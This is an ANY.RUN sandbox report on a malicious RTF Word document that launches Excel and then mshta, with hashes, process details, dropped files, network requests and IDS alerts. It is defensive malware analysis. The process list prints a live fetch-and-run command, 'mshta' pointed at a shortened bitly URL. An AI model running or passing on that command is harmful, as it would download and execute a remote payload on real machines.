analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

05e470_773b675a08744dbfb47b888c09158162.doc

Full analysis: https://app.any.run/tasks/d86e5a83-772b-42f9-a5f9-15d7d284bfb1
Verdict: Malicious activity
Analysis date: April 25, 2019, 13:13:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5:

481F42248AAA3E02F00DC453A8EEAFF2

SHA1:

323A67A4F70C559D04162441E37078676EBB4E07

SHA256:

3FFD5CE69BBF8E4A1CA9291744E71FA60BC1B863E5A15268F5B42C43B79DAE83

SSDEEP:

3072:CX3/BvEzcgqX3/BvEzcg6X3/BvEzcgqX3/BvEzcguX3/BvEzcg8:o/Bvoc3/Bvocz/Bvocz/Bvoc//BvocT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 3400)
      • EXCEL.EXE (PID: 3824)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3400)
      • EXCEL.EXE (PID: 3824)

    • Changes settings of System certificates

      • mshta.exe (PID: 3228)
      • mshta.exe (PID: 4056)

  • SUSPICIOUS

    • Creates files in the user directory

      • mshta.exe (PID: 3228)

    • Adds / modifies Windows certificates

      • mshta.exe (PID: 3228)
      • mshta.exe (PID: 4056)

  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3400)
      • WINWORD.EXE (PID: 2664)
      • EXCEL.EXE (PID: 3824)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2664)

    • Reads internet explorer settings

      • mshta.exe (PID: 3228)
      • mshta.exe (PID: 4056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs mshta.exe excel.exe no specs mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
2664"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\05e470_773b675a08744dbfb47b888c09158162.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3400"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3228mshta http://www.bitly.com/ChutasdhikhasdAS13C:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3824"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
4056mshta http://www.bitly.com/ChutasdhikhasdAS13C:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
756
Read events
664
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
4
Unknown types
3

Dropped files

PID
Process
Filename
Type
2664WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR638E.tmp.cvr
MD5:
SHA256:
3400EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR6B9D.tmp.cvr
MD5:
SHA256:
3400EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFD36C939DD030B6AB.TMP
MD5:
SHA256:
3824EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRAD68.tmp.cvr
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F5C578E.wmf
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B187D781.wmfwmf
MD5:F805B2269DCC910D671B2B45FE6CB033
SHA256:631983654C0F69751EB4AC2FD166981E1D7C1F895E1D8405D312092F310C0A3F
3228mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\warning[1].txthtml
MD5:80E8946AA6A9F56CE537A715C9EAB27E
SHA256:6591C2A9CA71A7ECC417E1AFAB6BEADCCEC03F99133EA6A07B6DC94C753D935B
4056mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\warning[1].txthtml
MD5:80E8946AA6A9F56CE537A715C9EAB27E
SHA256:6591C2A9CA71A7ECC417E1AFAB6BEADCCEC03F99133EA6A07B6DC94C753D935B
2664WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$e470_773b675a08744dbfb47b888c09158162.doc.rtfpgc
MD5:00CF76CDC232F84A3217428FA453F66B
SHA256:DEEC40C12F59A000F68E210B9371C52629CC2B718A65407D79C32FA526F2DCC6
3228mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txttext
MD5:8CB08150EF7D96FB8D3123162FB18A33
SHA256:BFC09E3F830789B000DD6700CAEFFD868C7A21B2B40AD0ADDF29207BC8544247
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
6
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3228
mshta.exe
GET
302
67.199.248.14:80
http://bitly.com/ChutasdhikhasdAS13
US
html
201 b
shared
4056
mshta.exe
GET
302
67.199.248.14:80
http://bitly.com/ChutasdhikhasdAS13
US
html
201 b
shared
4056
mshta.exe
GET
301
67.199.248.14:80
http://www.bitly.com/ChutasdhikhasdAS13
US
html
178 b
shared
3228
mshta.exe
GET
301
67.199.248.14:80
http://www.bitly.com/ChutasdhikhasdAS13
US
html
178 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3228
mshta.exe
67.199.248.14:80
www.bitly.com
Bitly Inc
US
shared
3228
mshta.exe
67.199.248.14:443
www.bitly.com
Bitly Inc
US
shared
4056
mshta.exe
67.199.248.14:80
www.bitly.com
Bitly Inc
US
shared
67.199.248.14:80
www.bitly.com
Bitly Inc
US
shared
4056
mshta.exe
67.199.248.14:443
www.bitly.com
Bitly Inc
US
shared

DNS requests

Domain
IP
Reputation
www.bitly.com
  • 67.199.248.14
  • 67.199.248.15
shared

Threats

PID
Process
Class
Message
3228
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3228
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
4056
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
05e470_773b675a08744dbfb47b888c09158162.doc